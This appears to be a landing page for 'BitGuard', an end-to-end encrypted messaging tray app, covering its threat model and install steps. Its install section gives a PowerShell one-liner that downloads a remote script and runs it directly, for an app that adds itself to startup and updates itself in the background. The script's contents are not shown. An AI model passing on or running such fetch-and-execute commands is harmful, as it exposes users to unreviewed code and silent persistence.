Zero-knowledge · client-side encryption

Messaging that
survives a breach.

BitGuard encrypts every message on your device before it leaves. The server stores only ciphertext — so a breached server, a stolen session, or a lost laptop reveals nothing.

AES-256-GCM + RSA-OAEP Keys encrypted at rest Self-hostable
On the server what an attacker sees
eyJrIjoiUk9mMlJ4b1o4b1c5c2t2b0pQ… 9f3a1c88b2e40d7715c6aa02e1b8… c4d9e7f0a3b6128d5e0f4a9c2b71d…
On your device what you read
@ops: keys rotated, staging is clean. proceed with the drop at 0300. 🔒
Designed for the worst case

Even total compromise reveals nothing

Most systems assume the server stays honest. BitGuard doesn't — it's built so the infrastructure can fall and your messages still can't be read.

Platform breach

The server holds only encrypted blobs — useless without your local key.

Session hijacking

A stolen token can't decrypt anything without your password-derived key.

Account takeover

No reset flows, no exposed credentials; passwords are scrypt-hashed, never stored raw.

Device theft

Your private key is encrypted at rest with your password. A stolen laptop yields ciphertext only.

Man-in-the-middle

Messages are encrypted before they're sent — and shipped over TLS on top.

Insider threat

Admins and the server have zero access to plaintext. Per-message whitelists gate every read.

End-to-end flow

Four steps, nothing to trust

01

Encrypt locally

A fresh AES key seals the message, wrapped to each recipient's public key.

02

Store ciphertext

The server keeps only encrypted blobs plus metadata — sender, whitelist, time.

03

Gated fetch

Only whitelisted users can pull their blob. Everyone else gets a flat denial.

04

Decrypt locally

The recipient unwraps the key with their on-device private key. Secrets never touch the server.

Get BitGuard

Install in one line

Open PowerShell and paste — it installs the tray app, runs in the background, and keeps itself updated.

PS> irm https://bitguard.scientra.one/install.ps1 | iex

Prefer manual? Download BitGuard.exe ·

01 · Install

Downloads the tray app to your profile and adds it to startup — no admin rights needed.

02 · Register

Open it from the tray, enter your registration key, and set a password that also encrypts your device key.

03 · Message

Send encrypted messages to whitelisted users. It lives in the tray and updates itself.